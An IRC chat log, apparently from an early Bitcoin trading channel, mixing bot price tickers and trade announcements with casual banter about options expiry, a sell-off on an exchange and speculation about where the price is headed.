BTC [+] Jan 24 20:04:51 ;;bids 18.5 Jan 24 20:04:53 There are currently 1738.429 bitcoins demanded at or over 18.5 USD, worth 32321.7429128 USD in total. Jan 24 20:04:54 [MPEX] [S.MPOE] 4839 @ 0.00061831 = 2.992 BTC [-] Jan 24 20:05:08 ;;asks 18.9 Jan 24 20:05:10 There are currently 209.75996 bitcoins offered at or under 18.9 USD, worth 3964.05008153 USD in total. Jan 24 20:06:32 !help Jan 24 20:06:32 List of commands: Jan 24 20:06:33 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Jan 24 20:07:07 [HAVELOCK] [SDICE] 48 @ 0.48 = 23.04 BTC [-] Jan 24 20:08:14 [MPEX] [O.BTCUSD.C200T] 28 @ 0.05560548 = 1.557 BTC [+] Jan 24 20:09:12 ;;ticker Jan 24 20:09:13 BTCUSD ticker | Best bid: 18.71106, Best ask: 18.80000, Bid-ask spread: 0.08894, Last trade: 18.80000, 24 hour volume: 100285.46180228, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.32253 Jan 24 20:09:24 protip : anyone that is sitting with lots of BTC in their account should probably sell short the C200Ts Jan 24 20:09:35 There is a bid @ 0.0556 Jan 24 20:09:59 at these are 95% chance going to expire worthless Jan 24 20:10:40 Also the C190s Jan 24 20:10:44 I am tapped out Jan 24 20:11:01 lol what if it blows up tomorrow ? Jan 24 20:13:23 tomorrow? Jan 24 20:13:35 WAIT A SECOND Jan 24 20:14:03 opex ex is in 28 hours? Jan 24 20:14:05 or 4 hours? Jan 24 20:14:11 facepalm Jan 24 20:15:35 !ticker Jan 24 20:15:35 These beans is shit. Jan 24 20:15:50 well Jan 24 20:15:51 shit Jan 24 20:15:54 hehe Jan 24 20:16:00 ;;ticker Jan 24 20:16:01 BTCUSD ticker | Best bid: 18.64001, Best ask: 18.72405, Bid-ask spread: 0.08404, Last trade: 18.72405, 24 hour volume: 100798.71042195, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.32833 Jan 24 20:16:18 undo Jan 24 20:16:21 Ctrl Z Jan 24 20:19:48 ctrl z unix stlye Jan 24 20:19:50 stylr Jan 24 20:23:09 [MPEX] [S.MPOE] 11300 @ 0.00062218 = 7.0306 BTC [+] Jan 24 20:23:11 [MPEX] [S.MPOE] 5629 @ 0.00062563 = 3.5217 BTC [+] Jan 24 20:23:16 ;;asks 35 Jan 24 20:23:18 There are currently 46311.125 bitcoins offered at or under 35.0 USD, worth 1175233.51427 USD in total. Jan 24 20:23:22 fuck it Jan 24 20:23:26 let it go to 35 Jan 24 20:23:35 lets do this Jan 24 20:24:01 i'm clapping my hands as fast as i can Jan 24 20:25:37 Bugpowder end of friday. Jan 24 20:26:00 yeah Jan 24 20:26:04 oh well Jan 24 20:26:09 it's easy to tell, cause bot stops quoting in the last 24 hours Jan 24 20:26:10 I have hedged my hedge Jan 24 20:26:22 lolwut ? Jan 24 20:26:29 I shorted the 200s Jan 24 20:26:41 I though it expires in 3.5 hours Jan 24 20:26:54 Plenty of long exposure though Jan 24 20:27:01 still Jan 24 20:29:18 ;;asks 20 Jan 24 20:29:19 There are currently 14737.674 bitcoins offered at or under 20.0 USD, worth 289424.291591 USD in total. Jan 24 20:29:33 a, i didn't see it ticker by Jan 24 20:29:43 assbot> [MPEX] [O.BTCUSD.C200T] 28 @ 0.05560548 = 1.557 BTC [+] < that ? Jan 24 20:30:23 Not sure people buying C200T calls are getting a good deal... Jan 24 20:31:09 which bot stopped quoting in last 24 hours? Jan 24 20:32:16 deadweasel the mpoe bot. Jan 24 20:32:39 thanks! Jan 24 20:34:37 [MPEX] [S.DICE] 550 @ 0.00598118 = 3.2896 BTC [-] Jan 24 20:35:17 Namworld: could we negotiate a vps deal? Jan 24 20:35:31 also bitvps is ltc now not btc? Jan 24 20:35:49 ;;ticker Jan 24 20:35:49 BTCUSD ticker | Best bid: 18.49451, Best ask: 18.50000, Bid-ask spread: 0.00549, Last trade: 18.50773, 24 hour volume: 101961.40270952, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.33730 Jan 24 20:36:24 anyone know what timezone mtgoxlive uses ? Jan 24 20:37:16 utc methinks Jan 24 20:37:19 new zealand i think Jan 24 20:37:28 https://bitcointalk.org/index.php?topic=101325.0 Jan 24 20:38:57 ah ty Jan 24 20:39:00 ;;bids 18.5 Jan 24 20:39:02 There are currently 0 bitcoins demanded at or over 18.5 USD, worth 0.0 USD in total. Jan 24 20:39:12 ;;bids 18 Jan 24 20:39:14 There are currently 7572.9213 bitcoins demanded at or over 18.0 USD, worth 137390.190975 USD in total. Jan 24 20:39:36 ;;asks 18.5 Jan 24 20:39:39 There are currently 3490.0446 bitcoins offered at or under 18.5 USD, worth 64216.8212472 USD in total. Jan 24 20:41:41 ;;bids 18.2 Jan 24 20:41:43 There are currently 3130.1004 bitcoins demanded at or over 18.2 USD, worth 57108.4266494 USD in total. Jan 24 20:41:45 [MPEX] [S.MPOE] 22100 @ 0.00062144 = 13.7338 BTC [-] Jan 24 20:41:47 [MPEX] [S.MPOE] 3911 @ 0.00061831 = 2.4182 BTC [-] Jan 24 20:41:49 [MPEX] [S.MPOE] 9100 @ 0.00061744 = 5.6187 BTC [-] Jan 24 20:41:50 [MPEX] [S.MPOE] 5600 @ 0.00061489 = 3.4434 BTC [-] Jan 24 20:41:51 [MPEX] [S.MPOE] 4789 @ 0.00061474 = 2.944 BTC [-] Jan 24 20:46:11 ;;whatis #supybot installguide Jan 24 20:46:12 Here is a detailed guide for supybot installation: http://sourceforge.net/apps/mediawiki/gribble/index.php?title=Supybot_Install_Guide Jan 24 20:46:14 Chilca: ^ Jan 24 20:46:41 nanotube: thanks! Jan 24 20:47:57 :) Jan 24 20:50:38 sales Jan 24 20:51:09 [MPEX] [S.MPOE] 4961 @ 0.00061474 = 3.0497 BTC [-] Jan 24 20:51:20 ;;ticker Jan 24 20:51:21 BTCUSD ticker | Best bid: 17.75000, Best ask: 18.20000, Bid-ask spread: 0.45000, Last trade: 18.20000, 24 hour volume: 110245.87360784, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.32315 Jan 24 20:51:48 ;;bc,24hprc Jan 24 20:51:49 18.31 Jan 24 20:52:02 o, going down ?! Jan 24 20:52:09 2 bucks soon. Jan 24 20:52:10 thestringpuller: We still accept BitPay, or on request direct BTC payment Jan 24 20:52:11 dude. literally. 17.75 is like max pain Jan 24 20:52:13 my bid is placed. Jan 24 20:52:29 if btc closes on mpex max pain tomorrow it will be... Jan 24 20:52:31 o.o Jan 24 20:52:31 6168 sold, now @ 17.85 Jan 24 20:53:02 i vunder vhat zee ruzzians vill do tonight? Jan 24 20:53:13 drink vodka. Jan 24 20:53:21 clearly Jan 24 20:53:49 mail order brides ? Jan 24 20:54:10 how much are those Jan 24 20:54:16 and can you get em for btc yet Jan 24 20:54:26 Max pain? Jan 24 20:54:31 http://bitcoinity.org/markets Jan 24 20:54:34 never seen lines like that Jan 24 20:54:48 The combination of puts/calls make 17.75 the worst price for BTC to end at? Jan 24 20:54:58 i dunno, like a used civic Jan 24 20:55:07 ;;bids 18 Jan 24 20:55:10 There are currently 2.7014995 bitcoins demanded at or over 18.0 USD, worth 49.0104492962 USD in total. Jan 24 20:55:17 eww Jan 24 20:55:17 Namworld i haven't calced it exactly but i guess around the 17.8 Jan 24 20:55:49 ;;asks 17.75 Jan 24 20:55:51 There are currently 0 bitcoins offered at or under 17.75 USD, worth 0.0 USD in total. Jan 24 20:55:57 oops Jan 24 20:56:09 ;;asks 18 Jan 24 20:56:11 There are currently 0 bitcoins offered at or under 18.0 USD, worth 0.0 USD in total. Jan 24 20:56:12 ;;ticker Jan 24 20:56:13 BTCUSD ticker | Best bid: 17.80000, Best ask: 17.80212, Bid-ask spread: 0.00212, Last trade: 17.80212, 24 hour volume: 110717.50956619, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.32198 Jan 24 20:58:10 it's fucken derped. Jan 24 20:58:38 [MPEX] [S.MPOE] 15834 @ 0.0006144 = 9.7284 BTC [-] Jan 24 20:58:47 we bounced of $16 similarly Jan 24 20:58:51 of = off Jan 24 20:59:02 and then back up Jan 24 21:00:22 Someone just sold a few thousands, nothing big Jan 24 21:00:34 You can see the line back up in price is very thin Jan 24 21:00:40 http://www.bitcoincharts.com/markets/mtgoxUSD.html Jan 24 21:01:06 I don't think it will end on "max pain" Jan 24 21:01:08 i think it's decided, we're staying under 20. Jan 24 21:01:18 I bet it stays around 18-18.5 Jan 24 21:01:25 prolly. Jan 24 21:01:29 im bullish Jan 24 21:01:55 More bids coming in... Jan 24 21:02:04 those who sold at 13 and 15 Jan 24 21:02:08 ? Jan 24 21:03:11 ;;ticker Jan 24 21:03:11 BTCUSD ticker | Best bid: 18.00519, Best ask: 18.01000, Bid-ask spread: 0.00481, Last trade: 18.01000, 24 hour volume: 111696.06234082, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.31988 Jan 24 21:04:00 $2 spread today wowza Jan 24 21:08:41 ;;asks 19 Jan 24 21:08:43 There are currently 2802.5713 bitcoins offered at or under 19.0 USD, worth 51995.2367015 USD in total. Jan 24 21:08:48 !ticker m s.dice Jan 24 21:08:50 [MPEX:S.DICE] 1D: 0.00085848 / 0.00388776 / 0.00699 (580073 shares, 2,255.19 BTC), 7D: 0.00085848 / 0.00446834 / 0.00699 (963061 shares, 4,303.29 BTC), 30D: 0.00085848 / 0.00416332 / 0.00699 (10208182 shares, 42,500.02 BTC) Jan 24 21:08:52 ;;bids 18 Jan 24 21:08:53 There are currently 924.42797 bitcoins demanded at or over 18.0 USD, worth 16639.9980641 USD in total. Jan 24 21:09:06 Yup, we're trending back toward 19 Jan 24 21:10:13 http://www.google.com/trends/explore#q=sell%20bitcoin%2C%20buy%20bitcoin&cmpt=q Jan 24 21:11:40 I doubt that's conclusive of anything. Those who have bitcoins probably already know where to sell them. Jan 24 21:11:53 Whereas the bitcoinless might be clueless about where to buy them. Jan 24 21:11:59 at the place where they bought them :) Jan 24 21:12:34 usually, yeah Jan 24 21:13:26 [MPEX] [S.MPOE] 9250 @ 0.00061531 = 5.6916 BTC [+] Jan 24 21:13:40 6:43 seems right Jan 24 21:14:49 i just thought it was interesting. graphs are pretty. I'll be your blonde for the day. Jan 24 21:14:54 lol Jan 24 21:15:04 [MPEX] [S.MPOE] 8589 @ 0.00062563 = 5.3735 BTC [+] Jan 24 21:15:06 [MPEX] [S.MPOE] 3261 @ 0.00062594 = 2.0412 BTC [+] Jan 24 21:15:47 http://www.google.com/trends/explore#q=sell%20bitcoin%2C%20buy%20bitcoin%2C%20trilema&cmpt=q Jan 24 21:15:48 grin Jan 24 21:16:42 ;;asks 20 Jan 24 21:16:46 There are currently 19030.797 bitcoins offered at or under 20.0 USD, worth 368929.2886 USD in total. Jan 24 21:16:53 ;;asks 35 Jan 24 21:16:55 There are currently 51898.3 bitcoins offered at or under 35.0 USD, worth 1279317.19633 USD in total. Jan 24 21:17:09 ;;asks 30 Jan 24 21:17:13 There are currently 37989.235 bitcoins offered at or under 30.0 USD, worth 836972.731819 USD in total. Jan 24 21:17:33 not this, not that, or that one! Jan 24 21:24:56 ;;ticker Jan 24 21:24:58 BTCUSD ticker | Best bid: 18.01111, Best ask: 18.08999, Bid-ask spread: 0.07888, Last trade: 18.09000, 24 hour volume: 114500.07664483, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.31550 Jan 24 21:25:22 and now for the popping of the bubble Jan 24 21:28:20 guesses at plateau? Jan 24 21:28:23 0 Jan 24 21:29:04 [MPEX] [S.MPOE] 13989 @ 0.00062594 = 8.7563 BTC [+] Jan 24 21:29:16 5000 sold down to $17.32 Jan 24 21:29:49 [MPEX] [O.BTCUSD.C160T] 1000 @ 0.12701747 = 127.0175 BTC [+] Jan 24 21:30:05 ;;ticker Jan 24 21:30:06 BTCUSD ticker | Best bid: 17.25500, Best ask: 17.80000, Bid-ask spread: 0.54500, Last trade: 17.80000, 24 hour volume: 120690.48492288, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.28021 Jan 24 21:31:30 [MPEX] [O.BTCUSD.C160T] 1000 @ 0.12558065 = 125.5807 BTC [-] Jan 24 21:32:45 [MPEX] [O.BTCUSD.P200T] 380 @ 0.11898031 = 45.2125 BTC [-] Jan 24 21:35:50 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.06416795 = 64.168 BTC [-] Jan 24 21:36:06 thestringpuller: really 0? Jan 24 21:37:15 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.07074194 = 70.7419 BTC [+] Jan 24 21:38:05 Interesting... significant raise in asks Jan 24 21:38:08 ;;asks 20 Jan 24 21:38:10 There are currently 28544.302 bitcoins offered at or under 20.0 USD, worth 544085.645737 USD in total. Jan 24 21:38:17 panic selling... Jan 24 21:38:24 ;;ticker Jan 24 21:38:24 BTCUSD ticker | Best bid: 17.58265, Best ask: 17.70000, Bid-ask spread: 0.11735, Last trade: 17.70000, 24 hour volume: 121181.30061837, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.27707 Jan 24 21:38:44 ;;bc,24hprc Jan 24 21:38:45 18.29 Jan 24 21:38:49 [MPEX] [O.BTCUSD.P200T] 620 @ 0.11898031 = 73.7678 BTC [-] Jan 24 21:40:02 yup panic sell Jan 24 21:40:19 ;;asks 20 Jan 24 21:40:21 There are currently 33198.198 bitcoins offered at or under 20.0 USD, worth 629272.33256 USD in total. Jan 24 21:40:27 and 5k more Jan 24 21:40:39 ;;ticker Jan 24 21:40:40 BTCUSD ticker | Best bid: 17.35400, Best ask: 17.58265, Bid-ask spread: 0.22865, Last trade: 17.58265, 24 hour volume: 121527.61952533, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.27448 Jan 24 21:41:45 ;;ticker Jan 24 21:41:45 BTCUSD ticker | Best bid: 17.35000, Best ask: 17.58165, Bid-ask spread: 0.23165, Last trade: 17.58165, 24 hour volume: 121535.07032037, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.27443 Jan 24 21:42:02 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.0650654 = 65.0654 BTC [+] Jan 24 21:42:02 it is but a twitch Jan 24 21:42:06 23 cent spread... Jan 24 21:42:08 [MPEX] [O.BTCUSD.C170T] 834 @ 0.06972141 = 58.1477 BTC [-] Jan 24 21:42:46 ;;asks 20 Jan 24 21:42:48 There are currently 33200.54 bitcoins offered at or under 20.0 USD, worth 630008.064237 USD in total. Jan 24 21:43:37 ;;ticker Jan 24 21:43:37 BTCUSD ticker | Best bid: 17.45798, Best ask: 17.58165, Bid-ask spread: 0.12367, Last trade: 17.58165, 24 hour volume: 121465.95922053, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.27491 Jan 24 21:43:40 goxlive working for anyone? Jan 24 21:43:51 nope Jan 24 21:43:57 moody is ok for me Jan 24 21:43:57 ;;ticker Jan 24 21:43:58 BTCUSD ticker | Best bid: 17.55475, Best ask: 17.58165, Bid-ask spread: 0.02690, Last trade: 17.58165, 24 hour volume: 121466.86376050, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.27491 Jan 24 21:44:28 moody is dropping the socket for me Jan 24 21:45:02 the soaplet ? Jan 24 21:46:06 EskimoBob_afk: can you stop being afk kthcbai Jan 24 21:46:11 kthxbai* Jan 24 21:46:16 ;) Jan 24 21:46:23 dude we want moar afk from him Jan 24 21:46:29 haha Jan 24 21:46:42 Well anyway, I cashed out my calls. Jan 24 21:47:01 the 16s 'eh Jan 24 21:47:16 The C170 Jan 24 21:47:20 ah Jan 24 21:47:23 It's swinging wildly and I'm not sure what direction it's going to take Jan 24 21:47:28 I made about 20% Jan 24 21:47:32 heheh, nice Jan 24 21:47:36 eh =/ Jan 24 21:47:59 [MPEX] [O.BTCUSD.C160T] 400 @ 0.12462015 = 49.8481 BTC [-] Jan 24 21:48:14 i think it just needs to re-group and restack the bid side Jan 24 21:48:20 20% holy shit Jan 24 21:48:56 you should have seen 7 a week! Jan 24 21:49:05 [MPEX] [O.BTCUSD.P180T] 5 @ 0.01714312 = 0.0857 BTC [-] Jan 24 21:49:07 facepalm Jan 24 21:49:43 lots more selling, dudes need to take some profits before next leg up i guess. Jan 24 21:50:08 ;;ticker Jan 24 21:50:11 BTCUSD ticker | Best bid: 16.90000, Best ask: 17.04931, Bid-ask spread: 0.14931, Last trade: 17.04931, 24 hour volume: 128741.64517108, 24 hour low: 16.90000, 24 hour high: 19.18999, 24 hour vwap: 18.20612 Jan 24 21:50:33 BTFD! Jan 24 21:50:47 [MPEX] [O.BTCUSD.P190T] 700 @ 0.06803599 = 47.6252 BTC [+] Jan 24 21:51:11 ;;ticker Jan 24 21:51:11 BTCUSD ticker | Best bid: 16.90000, Best ask: 17.04931, Bid-ask spread: 0.14931, Last trade: 17.04931, 24 hour volume: 128662.61322857, 24 hour low: 16.90000, 24 hour high: 19.18999, 24 hour vwap: 18.20661 Jan 24 21:51:20 [MPEX] [S.MPOE] 11411 @ 0.00062641 = 7.148 BTC [+] Jan 24 21:51:22 [MPEX] [S.MPOE] 7089 @ 0.00062294 = 4.416 BTC [-] Jan 24 21:51:29 ;;bc,24hprc Jan 24 21:51:30 18.21 Jan 24 21:51:34 its crashing oh man buy some mpoe stock Jan 24 21:51:37 go bot go Jan 24 21:51:45 actually each time there's a raise in BTC price, it ends up with a few days where it skyrockets before falling wildly. Jan 24 21:51:49 rather than ticker every 9 seconds, you could join -markets or -rt Jan 24 21:51:53 heres a pro comment Jan 24 21:51:54 [20:51:08] Kyklos Trader: is that moron of s3052 Jan 24 21:51:54 [20:51:13] Kyklos Trader: he probably sent a sell warning Jan 24 21:51:54 [20:51:18] Kyklos Trader: and all his stupid customers selling Jan 24 21:52:14 he didnt Jan 24 21:52:16 moar lines damnit! Jan 24 21:52:19 Although nothing says history will repeat itself... Jan 24 21:52:39 Who's the s3052 moron? Jan 24 21:52:51 r2d2 v3.052 Jan 24 21:52:57 'analyst' selling 'analyses' on bitcointalk Jan 24 21:53:15 i do like that word, too. Jan 24 21:53:19 pied piper of speculation forum Jan 24 21:53:24 oh, the guy with the charts for sale? Jan 24 21:53:30 hmm Jan 24 21:53:32 get your charts here! Jan 24 21:53:37 many many lines Jan 24 21:53:38 2.5 btc a months! Jan 24 21:53:38 iirc, he's big into EWT Jan 24 21:53:41 and arrows! Jan 24 21:53:51 jcpham: cocain is a helluva drug Jan 24 21:54:03 it's not a drug, it's a sort of sugar. Jan 24 21:54:12 sugar is a drug Jan 24 21:54:23 sugar is a poison! Jan 24 21:54:24 well yes. Jan 24 21:54:32 sugar is mah babeee Jan 24 21:54:39 ;;ticker Jan 24 21:54:39 BTCUSD ticker | Best bid: 16.95000, Best ask: 17.04831, Bid-ask spread: 0.09831, Last trade: 16.95000, 24 hour volume: 128417.99846413, 24 hour low: 16.90000, 24 hour high: 19.18999, 24 hour vwap: 18.20810 Jan 24 21:54:45 and we're under 17... Jan 24 21:54:52 lmao dudes with the tickering. Jan 24 21:54:55 14:53] --- kakobrekla [~T42@89-212-41-49.static.t-2.net] has joined #bitcoin-analysis Jan 24 21:54:58 [14:53] --- kakobrekla has left #bitcoin-analysis [] Jan 24 21:55:04 missed opportunity there! Jan 24 21:55:20 Damn Mr. officer, I didn't know! Jan 24 21:55:43 mircea_popescu: you are the ticker police now? Jan 24 21:55:46 ;;ticker Jan 24 21:55:47 BTCUSD ticker | Best bid: 16.95000, Best ask: 17.03000, Bid-ask spread: 0.08000, Last trade: 17.03000, 24 hour volume: 128420.24466504, 24 hour low: 16.90000, 24 hour high: 19.18999, 24 hour vwap: 18.20805 Jan 24 21:55:59 !ticker h sdice Jan 24 21:56:02 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.55930046 / 0.60000000 (436 shares, 243.85500031 BTC), 7D: 0.48000000 / 0.55210064 / 0.62000000 (916 shares, 505.72418966 BTC), 30D: 0.37000000 / 0.47575697 / 0.62000000 (4618 shares, 2197.04568954 BTC) Jan 24 21:56:09 Okay, it would have worked a bit better if I had said under 16... Jan 24 21:56:28 inb4 $20 Jan 24 21:56:29 I wasn't answering to mircea =/ Jan 24 21:57:04 ftr : #bitcoin-anal Jan 24 21:57:11 please crash Jan 24 21:57:14 pleash Jan 24 21:57:15 hah Jan 24 21:57:26 Bugpowder i thought you had calls or w/e ? Jan 24 21:58:15 I reversed Jan 24 21:58:21 o ? Jan 24 21:58:23 Sold calls for 50-80% gain Jan 24 21:58:30 pretty solid. Jan 24 21:58:32 now long puts Jan 24 21:58:37 3700 contracts Jan 24 21:58:42 let it rip Jan 24 22:00:15 god dammit Jan 24 22:00:31 [MPEX] [S.MPOE] 1728 @ 0.00062771 = 1.0847 BTC [+] Jan 24 22:00:33 my bot put in a sell@market right at the fucking peak Jan 24 22:00:33 [MPEX] [S.MPOE] 13700 @ 0.00062933 = 8.6218 BTC [+] Jan 24 22:00:34 [MPEX] [S.MPOE] 3122 @ 0.00063031 = 1.9678 BTC [+] Jan 24 22:00:38 status:pending Jan 24 22:01:16 Give your bot a cookie Jan 24 22:01:32 I think the little gox engine that could, in fact couldnt Jan 24 22:01:58 ah, result: 16.9 Jan 24 22:02:06 sonofabitch Jan 24 22:02:12 :/ Jan 24 22:02:21 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.06897496 = 68.975 BTC [+] Jan 24 22:02:27 fuck you gox Jan 24 22:02:41 um Jan 24 22:02:45 16.9 is a nice price Jan 24 22:02:48 its going much lower Jan 24 22:03:23 Bugpowder: but it sold when there were bids at ~19.19 Jan 24 22:03:31 who Jan 24 22:03:32 whoa Jan 24 22:03:35 sux Jan 24 22:05:05 Why does BTC price always slowly walk up to the cliff then do a a rocket launch before diving into the ocean? Jan 24 22:05:25 [MPEX] [S.MPOE] 15561 @ 0.00062294 = 9.6936 BTC [-] Jan 24 22:05:26 [MPEX] [S.MPOE] 116 @ 0.00061531 = 0.0714 BTC [-] Jan 24 22:05:28 [MPEX] [S.MPOE] 6323 @ 0.00061382 = 3.8812 BTC [-] Jan 24 22:05:30 swam dive Jan 24 22:05:32 swan Jan 24 22:05:40 it builds and builds, and then just about every time someone comes in and flushes about 100,000 to take profits Jan 24 22:06:09 [MPEX] [S.MPOE] 7878 @ 0.00063031 = 4.9656 BTC [+] Jan 24 22:06:10 [MPEX] [S.MPOE] 11648 @ 0.0006308 = 7.3476 BTC [+] Jan 24 22:06:12 cha-ching 100k Jan 24 22:06:14 what mod6 said Jan 24 22:06:16 cha-ching 100k Jan 24 22:06:28 It looks like that, seriously Jan 24 22:06:46 is it actually possible to know it's a single person? Jan 24 22:07:01 its hard to say. im sure its not though. Jan 24 22:07:02 i would tend to agree, but I just assume. Jan 24 22:07:29 feels like some rich mofos have their hands in it now. Jan 24 22:08:02 course i have no skills so I just trade on feelings Jan 24 22:08:03 they do Jan 24 22:08:12 feeeeeeelings, nothing but feeeeeeelings Jan 24 22:08:17 haha Jan 24 22:08:26 the BTC market is probably being played... Jan 24 22:08:37 lmao all those short puts ouch. Jan 24 22:08:43 for those who get paid for service and immediatly cash out tho, no problem Jan 24 22:08:57 price can fluctuate Jan 24 22:09:00 maybe so... but someday these $4-6 swings won't be as meaningful. think of the gold price, moves up and down sometimes $100 per day. Jan 24 22:09:25 that's true. Jan 24 22:09:38 yeah Jan 24 22:09:43 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.99330402 = 993.304 BTC [+] Jan 24 22:09:44 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.06037384 = 1060.3738 BTC [+] Jan 24 22:09:45 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.12744366 = 1127.4437 BTC [+] Jan 24 22:09:47 um Jan 24 22:09:52 lol speaking of Jan 24 22:09:54 haha *shrug* Jan 24 22:10:06 hahaha Jan 24 22:10:11 cover that shit Jan 24 22:10:20 buyers at 19 crying in -otc Jan 24 22:10:20 ok so guy bought for what, like 900ish, covering for 1kish, that's 100 btc each line for mpoe Jan 24 22:10:30 100x 27 = 2.7k Jan 24 22:10:31 cover the 27000 contracts of exposure Jan 24 22:10:43 i guess it did not work as planned. Jan 24 22:11:03 Bugpowder in the end i think it was 30k actually. Jan 24 22:11:13 nice Jan 24 22:11:26 $10 is in play Jan 24 22:11:31 he would have been dancing if the price had shot to $50 though Jan 24 22:11:33 Well looks like a good month for MPOE coming up in the end Jan 24 22:11:39 let everyone know : adding more options is serving your shareholders. Jan 24 22:11:40 Although who knows Jan 24 22:11:58 mod6 anything over 30ish really, yeah. free 30k btc Jan 24 22:12:00 Well the options are well priced... Jan 24 22:12:08 For risk Jan 24 22:12:22 Namworld it was ahead a coupla k's, prolly like >5k this month. Jan 24 22:12:32 When I trade them, I wait for high volatility and trade them live and stick around. Jan 24 22:13:00 Because current trading is often 1-2 USD different than average and average moves fast Jan 24 22:13:04 [MPEX] [O.BTCUSD.P330T] 1000 @ 1.0006288 = 1000.6288 BTC [+] Jan 24 22:13:05 [MPEX] [O.BTCUSD.P340T] 1000 @ 1.06792058 = 1067.9206 BTC [+] Jan 24 22:13:07 [MPEX] [O.BTCUSD.P350T] 1000 @ 1.13521236 = 1135.2124 BTC [+] Jan 24 22:13:24 it's like there's another pirate scheme or something d: Jan 24 22:13:26 lol Jan 24 22:13:32 last time 15.5 to 7.8 Jan 24 22:13:48 lol plus 30 x 60ish btc, so another 1800 there Jan 24 22:13:58 bois an' gals, this month mpoe might be over 10k Jan 24 22:14:07 well Jan 24 22:14:10 I'm taking some of it Jan 24 22:14:11 :) Jan 24 22:14:30 no cause after this guy covers it goes to 22 Jan 24 22:15:00 [MPEX] [O.BTCUSD.P190T] 816 @ 0.07206487 = 58.8049 BTC [+] Jan 24 22:15:02 heheheh Jan 24 22:15:02 haha, maybe so Jan 24 22:15:11 [MPEX] [O.BTCUSD.P180T] 1 @ 0.01966399 BTC [+] Jan 24 22:15:39 ;;asks 16 Jan 24 22:15:41 There are currently 0 bitcoins offered at or under 16.0 USD, worth 0.0 USD in total. Jan 24 22:15:47 ;;bids 16 Jan 24 22:15:48 There are currently 6592.124 bitcoins demanded at or over 16.0 USD, worth 106482.868699 USD in total. Jan 24 22:15:49 I mean Jan 24 22:15:58 I think bitcoiners are actually goldfish Jan 24 22:15:59 $10 Jan 24 22:16:06 be ready Jan 24 22:16:19 woohoo... I want me some cheap bitcoins! Jan 24 22:16:21 ;;bids 10 Jan 24 22:16:23 There are currently 81945.176 bitcoins demanded at or over 10.0 USD, worth 1077575.27046 USD in total. Jan 24 22:16:29 Going to buy them all Jan 24 22:16:52 you better believe that if it hits $10, i'll be running to the store to get MPs Jan 24 22:17:09 [HAVELOCK] [SDICE] 10 @ 0.464 = 4.64 BTC [-] Jan 24 22:17:11 [HAVELOCK] [SDICE] 3 @ 0.464 = 1.392 BTC [-] Jan 24 22:17:19 0 degrees or not! lol Jan 24 22:18:06 srsly, running. Jan 24 22:18:09 [HAVELOCK] [SDICE] 9 @ 0.463 = 4.167 BTC [-] Jan 24 22:18:18 [MPEX] [S.MPOE] 29571 @ 0.0006308 = 18.6534 BTC [+] Jan 24 22:18:20 [MPEX] [S.MPOE] 9321 @ 0.00063116 = 5.883 BTC [+] Jan 24 22:18:21 [MPEX] [S.MPOE] 5000 @ 0.0006332 = 3.166 BTC [+] Jan 24 22:18:22 [MPEX] [S.MPOE] 5758 @ 0.00063393 = 3.6502 BTC [+] Jan 24 22:18:24 [MPEX] [S.MPOE] 17627 @ 0.00063554 = 11.2027 BTC [+] Jan 24 22:18:25 [MPEX] [S.MPOE] 5000 @ 0.0006363 = 3.1815 BTC [+] Jan 24 22:18:26 [MPEX] [S.MPOE] 13400 @ 0.00063696 = 8.5353 BTC [+] Jan 24 22:18:27 [MPEX] [S.MPOE] 32468 @ 0.00063718 = 20.688 BTC [+] Jan 24 22:18:28 [MPEX] [S.MPOE] 52038 @ 0.00064091 = 33.3517 BTC [+] Jan 24 22:18:29 [MPEX] [S.MPOE] 6050 @ 0.00064327 = 3.8918 BTC [+] Jan 24 22:18:30 [MPEX] [S.MPOE] 3850 @ 0.00064454 = 2.4815 BTC [+] Jan 24 22:18:31 [MPEX] [S.MPOE] 4900 @ 0.00067924 = 3.3283 BTC [+] Jan 24 22:18:32 [MPEX] [S.MPOE] 7800 @ 0.00067925 = 5.2982 BTC [+] Jan 24 22:18:32 S.MPOE going up good Jan 24 22:18:33 [MPEX] [S.MPOE] 3200 @ 0.0006796 = 2.1747 BTC [+] Jan 24 22:18:34 [MPEX] [S.MPOE] 20000 @ 0.00067997 = 13.5994 BTC [+] Jan 24 22:18:35 yeeeeeeeeeehaw Jan 24 22:18:35 [MPEX] [S.MPOE] 9000 @ 0.00067998 = 6.1198 BTC [+] Jan 24 22:18:36 [MPEX] [S.MPOE] 40500 @ 0.00067999 = 27.5396 BTC [+] Jan 24 22:18:37 [MPEX] [S.MPOE] 334517 @ 0.00068 = 227.4716 BTC [+] Jan 24 22:18:50 lol Jan 24 22:19:05 http://bitcoincharts.com/charts/mtgoxUSD#rg60zczsg2012-08-18zeg2012-08-20ztgSzm1g10zm2g25 Jan 24 22:19:11 Remember what happened last time Jan 24 22:19:29 yup Jan 24 22:19:44 http://bitcoincharts.com/charts/mtgoxUSD#rg30zig2-hourztgSzbgBza1gTMAzm1g10za2gTMAzm2g200zi1gMACDzi2gWilliamRzi3gCMFzi4gCVolatilityzv Jan 24 22:20:09 [HAVELOCK] [SDICE] 1 @ 0.463 BTC [-] Jan 24 22:20:11 [HAVELOCK] [SDICE] 8 @ 0.4625 = 3.7 BTC [-] Jan 24 